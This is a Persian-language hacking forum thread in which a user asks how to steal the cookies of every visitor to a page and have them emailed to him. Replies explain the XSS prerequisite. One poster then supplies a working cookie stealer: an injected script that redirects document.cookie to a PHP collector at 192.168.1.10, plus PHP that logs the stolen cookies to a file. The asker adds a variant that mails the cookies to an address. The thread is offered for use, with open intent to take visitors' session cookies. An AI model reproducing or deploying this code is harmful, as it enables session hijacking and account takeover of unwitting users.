OOOHHHAAACCCKKKOOO

ارسال کوکی به ایمیل

25 ارسال در این موضوع قرار دارد

در 4 ساعت قبل، OOOHHHAAACCCKKKOOO گفته است :

پس چطور اون کوکی رو با کد PHP یا Java script بگیرم؟

سلام 

بدون داشتن اسیب پذیری در سایت مورد نظر (از جمله اسیب پذیری xss ) شما عملا نمیتونید کوکی های تارگت رو به سرقت ببرید چونکه کدها برای اینکار باید به نحوی به سایت تزریق بشه گرچه شاید باشند کسانی که اسکریپت یا روشهای کشف کرده باشند که بنده از اونها بی اطلاع هستم.

ولی بصورت کلی سایتهای که امنیت قابل قبولی دارند در صورت دریافت اسکریپت برای دریافت کوکی اون اسکریپت و کدهای درون اون رو اسکیپ میکنن.

پیشنهاد بنده به شما اینکه سایت مورد نظر رو بدقت بررسی کنید و تمام تستهای امنیتی که به اون مسلط هستید رو روی سایت انجام بدید شاید بتونید باگ و راهی برای نفوذ پیدا کنید اگر چه باز راهی برای نفوذ پیدا نکردید میتونید از سایت های روی سرور کمک بگیرید و اونا رو هم بررسی کنید.

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در در 1397/11/15, 18:16:16، virtual_hate گفته است :

سلام 

بدون داشتن اسیب پذیری در سایت مورد نظر (از جمله اسیب پذیری xss ) شما عملا نمیتونید کوکی های تارگت رو به سرقت ببرید چونکه کدها برای اینکار باید به نحوی به سایت تزریق بشه گرچه شاید باشند کسانی که اسکریپت یا روشهای کشف کرده باشند که بنده از اونها بی اطلاع هستم.

ولی بصورت کلی سایتهای که امنیت قابل قبولی دارند در صورت دریافت اسکریپت برای دریافت کوکی اون اسکریپت و کدهای درون اون رو اسکیپ میکنن.

پیشنهاد بنده به شما اینکه سایت مورد نظر رو بدقت بررسی کنید و تمام تستهای امنیتی که به اون مسلط هستید رو روی سایت انجام بدید شاید بتونید باگ و راهی برای نفوذ پیدا کنید اگر چه باز راهی برای نفوذ پیدا نکردید میتونید از سایت های روی سرور کمک بگیرید و اونا رو هم بررسی کنید.

خب اگه من به صورت کامل به سایت دسترسی داشته باشم، میتونم کوکی تارگت رو به سرقت ببرم؟ 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 29 دقیقه قبل، OOOHHHAAACCCKKKOOO گفته است :

خب اگه من به صورت کامل به سایت دسترسی داشته باشم، میتونم کوکی تارگت رو به سرقت ببرم؟ 

سلام 

متوجه دلیل اینکار شما نمیشم وقتی دسترسی کامل دارید و میتونید با یوزرنیم پسورد قربانی لاگین بشید دیگه گرفتن کوکی اون شخص چه سودی برای شما داره ؟

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 12 دقیقه قبل، virtual_hate گفته است :

سلام 

متوجه دلیل اینکار شما نمیشم وقتی دسترسی کامل دارید و میتونید با یوزرنیم پسورد قربانی لاگین بشید دیگه گرفتن کوکی اون شخص چه سودی برای شما داره ؟

خب راستش هدف من دسترسی به سایت نیست هدف من سرقت کوکی اون شخصه. (کوکیش در اون سایتی که من بهش دسترسی کامل دارم.)

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 46 دقیقه قبل، OOOHHHAAACCCKKKOOO گفته است :

خب راستش هدف من دسترسی به سایت نیست هدف من سرقت کوکی اون شخصه. (کوکیش در اون سایتی که من بهش دسترسی کامل دارم.)

این واقعا عجیب ترین هدفی بوده که تو بحث هکینگ دیدم 

ولی شما میتونید وارد قسمت کدنویسی صفحه لاگین بشید صفحه ای رو که بعد از احراز هویت شدن ریدایرکت میشه رو پیدا کنید و وارد کدهای سمت سرور اون صفحه بشید  و یک تیکه کد ساده بهش اضافه کنید که کوکی تمام کاربرا یا با یک شرط که اون یوزرنیم رومشخص میکنه رو بگیرید و کوکیش رو بردارید و تا زمانی که دکمه خروج رو نمیزنه و  سشن منقضی نشه میتونید ازش استفاده کنید.

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 1 ساعت قبل، virtual_hate گفته است :

این واقعا عجیب ترین هدفی بوده که تو بحث هکینگ دیدم 

ولی شما میتونید وارد قسمت کدنویسی صفحه لاگین بشید صفحه ای رو که بعد از احراز هویت شدن ریدایرکت میشه رو پیدا کنید و وارد کدهای سمت سرور اون صفحه بشید  و یک تیکه کد ساده بهش اضافه کنید که کوکی تمام کاربرا یا با یک شرط که اون یوزرنیم رومشخص میکنه رو بگیرید و کوکیش رو بردارید و تا زمانی که دکمه خروج رو نمیزنه و  سشن منقضی نشه میتونید ازش استفاده کنید.

شاید منظور من رو اشتباه متوجه شدین. لاگینی در کار نیست.

فرض کنید که مثلا من به لینک http://google.com دسترسی کامل دارم.(که این لینک نیاز به لاگین نداره.)

حالا میخوام یک کاری کنم که هر کی به این لینک وارد شد، من کوکیش رو ببینم.

منظورم من هم از کوکی این کوکی هست 👇

 

Cookie.png

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

با سلام خدمت شما دوست عزیز

وقتی شما یوزر پس رو داری دیگه نیازی بع اتیلر کوکی نیس اما با این حال بنده با دانش اندکی که دارم یکم توضیح بدم در  رابطه با کوکی استیلر

اینو شما میتونی رو هر کاربری که پیج شمارو وا کنه اجرا کنی

نکته :این اموزش فقط جنبه علمی اموزشی داره و نحوه استفاده از اون بر میگرده شخصیت فرد وبنده مسولیتی در قبال دزدیدن کوکی دیگران ندارم

شما فقط نیازمند 3تا فایل هستید اولی پیج htmlکه به کاربر نشون میده

دومی کد phpکه براتون کار دزدیدن کوکی رو برعهده داره

و سومی که یک فایله که کار نگه داشتن کوکی های دزدی رو بر عهده داره

قدم اول:

ساخت صفحه دلخواهتون

<html>
<body>
</body>
</html>

قدم دوم:

تزریق کدتون که جایی اپلود کردین تا کوکی بهش ارسال بشه

<script>location.href="http://192.168.1.10/steal/0utc4s7.php?cookie="%2bdocument.cookie</script>

 

قدم سوم :

ساخت کد پی اچ پی

0utc4s7-stealer.php

<?php
$cookie = $_GET['cookie'];
$f = fopen("0utc4s7file.txt" , "a");
fwrite($f , $cookie);
fclose($f);
?>

 

وساختن فایلی به اسم.0utc4s7.txt

 

وکار تمام است.

***********************************************************

یا در حالت خیلی ساده و ساده تر شما فقط اگر خواستین میتونید به دوتای اینها نیاز داشته باشید یکی کد پی اچ پی و دیگری فایل نوت پد

در سایه حق

دوستان چون جاش اینجا نیس نمیتونم بیشتر از این توضیح بدم بنابه دلایل و قوانین انجمن که نمیتونیم قوانین کارگزاری رو زیر پا بزاریم

با سپاس

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 19 ساعت قبل، 0r0b4s گفته است :

با سلام خدمت شما دوست عزیز

وقتی شما یوزر پس رو داری دیگه نیازی بع اتیلر کوکی نیس اما با این حال بنده با دانش اندکی که دارم یکم توضیح بدم در  رابطه با کوکی استیلر

اینو شما میتونی رو هر کاربری که پیج شمارو وا کنه اجرا کنی

نکته :این اموزش فقط جنبه علمی اموزشی داره و نحوه استفاده از اون بر میگرده شخصیت فرد وبنده مسولیتی در قبال دزدیدن کوکی دیگران ندارم

شما فقط نیازمند 3تا فایل هستید اولی پیج htmlکه به کاربر نشون میده

دومی کد phpکه براتون کار دزدیدن کوکی رو برعهده داره

و سومی که یک فایله که کار نگه داشتن کوکی های دزدی رو بر عهده داره

قدم اول:

ساخت صفحه دلخواهتون


<html>
<body>
</body>
</html>

قدم دوم:

تزریق کدتون که جایی اپلود کردین تا کوکی بهش ارسال بشه


<script>location.href="http://192.168.1.10/steal/0utc4s7.php?cookie="%2bdocument.cookie</script>

 

قدم سوم :

ساخت کد پی اچ پی

0utc4s7-stealer.php


<?php
$cookie = $_GET['cookie'];
$f = fopen("0utc4s7file.txt" , "a");
fwrite($f , $cookie);
fclose($f);
?>

 

وساختن فایلی به اسم.0utc4s7.txt

 

وکار تمام است.

***********************************************************

یا در حالت خیلی ساده و ساده تر شما فقط اگر خواستین میتونید به دوتای اینها نیاز داشته باشید یکی کد پی اچ پی و دیگری فایل نوت پد

در سایه حق

دوستان چون جاش اینجا نیس نمیتونم بیشتر از این توضیح بدم بنابه دلایل و قوانین انجمن که نمیتونیم قوانین کارگزاری رو زیر پا بزاریم

با سپاس

 

ممنونم. فقط اگه صفحه ای که کاربر توش هست بجای html و همون کد قدم دوم فقط با php نوشته شده باشه و کدش هم این باشه، کوکیش در اون صفحه به ایمیل 123@gmail.com ارسال میشه؟

<?php

$cookie = $_GET['cookie'];

mail( '123@gmail.com', 'Hello!',

"$cookie." );

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری